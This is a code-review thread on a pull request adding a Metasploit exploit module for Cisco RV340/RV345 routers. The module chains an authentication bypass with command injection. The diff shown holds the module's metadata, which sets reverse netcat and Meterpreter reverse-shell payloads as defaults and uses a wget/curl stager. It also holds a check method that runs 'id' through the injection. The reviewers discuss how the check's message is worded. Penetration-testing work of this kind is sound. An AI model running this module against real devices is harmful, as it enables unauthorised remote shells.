modules/exploits/linux/http/cisco_rv340_lan.rb

```diff
@@ -0,0 +1,167 @@
+          RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
+          at Sea Security.
+
+          This module works on firmware versions 1.0.03.24 and below
+        },
+        'License' => MSF_LICENSE,
+        'Platform' => ['Linux', 'Unix'],
+        'Author' => [
+          'Biem Pham',  # Vulnerability Discoveries
+          'Neterum',    # Metasploit Module
+          'jbaines-r7'  # This metasploit module is heavily inspired from
+          # cisco_rv_series_authbypass_and_rce.rb
+        ],
+        'DisclosureDate' => '2021-11-02',
+        'Arch' => [ARCH_CMD, ARCH_ARMLE],
+        'References' => [
+          [ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
+          [ 'CVE', '2022-20705'], # Authentication Bypass
+          [ 'CVE', '2022-20707'], # Command Injection
+          [ 'ZDI', '22-409'], # Authentication Bypass
+          [ 'ZDI', '22-410'], # Path Traversal leading to Authentication Bypass
+          [ 'ZDI', '22-411']  # Command Injection
+        ],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => {},
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'Payload' => {
+                'BadChars' => '\''
+              },
+              'CmdStagerFlavor' => [ 'wget', 'curl' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'MeterpreterTryToFork' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Base path', '/'])
+      ]
+    )
+  end
+
+  def check
+    # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
+    # Test to see if router is responding and possibly vulnerable
+    res = send_exploit('id')
+    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
+    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
+
+    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
+      return CheckCode::Appears('The device responded to exploitation with a 200 OK.')
```

Comment:
Uh this is checking for a 301 moved permanently code in the body? I'm confused here. If we are checking the response code we should be checking `res.code` here.

Reply:
If an exploit packet is successful, the packet itself returns a successful response 200, but the body of the packet will also include the `301 Moved Permanently`.  It is just how the router responds.  
![Response](https://user-images.githubusercontent.com/16675549/217692951-c7226359-7a62-4a34-8db3-86a38d8f734a.PNG)

Reply:
I think the wording here is not appropriate as realistically what your actually checking for here is that it responded with 200 OK and that it had the right body contents. The message implies that you just checked it had a 200 OK response, not that you also did these body content checks.

Reply:
Okay I understand your confusion now.  I will clean this up on next commit.

Reply:
The line `'The device responded to exploitation with a 200 OK.'` should become `'The device responded to exploitation with a 200 OK and a message body containing the appropriate 301 response text.'` or something to this effect.

Reply:
Rewrote the check portion of the code, eliminating the need for this response.